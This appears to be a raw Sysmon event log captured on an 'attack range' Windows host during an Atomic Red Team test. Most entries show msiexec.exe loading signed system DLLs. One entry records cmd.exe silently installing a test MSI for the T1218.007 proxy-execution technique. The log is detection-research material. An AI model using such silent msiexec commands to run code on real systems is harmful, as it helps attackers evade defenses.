734700x80000000000000002695231Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 18141800x80000000000000002695229Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-ConnectPipe2022-06-17 15:05:10.397{7CF983DC-9826-62AC-366B-000000006202}4024\wkssvcc:\windows\system32\msiexec.exeWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695228Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695227Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695226Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695225Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695224Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\msctf.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=CA0121D9089BBFE1CB95A04E09E04C90,SHA256=B264FBE125E02FFBCDBBFF811B75B3ECEF31FD7762BD67BEE41492ED33CC146FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695223Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695222Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695221Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695220Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695219Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695218Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695217Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695216Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695215Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695214Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695213Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695212Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695211Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695210Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695209Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695208Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695207Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.381{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695205Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695204Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695203Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695202Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695201Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695200Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695199Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695198Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695197Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695196Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695195Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695194Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695193Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695192Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695191Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695190Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695189Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695188Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695187Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695186Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695184Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-EE97-62A8-7E00-000000006202}18083264C:\Windows\system32\csrss.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695183Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.366{7CF983DC-9826-62AC-346B-000000006202}33041780C:\Windows\SYSTEM32\cmd.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\SYSTEM32\cmd.exe+f1e1|C:\Windows\SYSTEM32\cmd.exe+11a37|C:\Windows\SYSTEM32\cmd.exe+cb0d|C:\Windows\SYSTEM32\cmd.exe+c295|C:\Windows\SYSTEM32\cmd.exe+f916|C:\Windows\SYSTEM32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002695182Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.371{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_EXE.msi"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-9826-62AC-346B-000000006202}3304C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_EXE.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002695138Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.350{7CF983DC-9826-62AC-356B-000000006202}4608C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 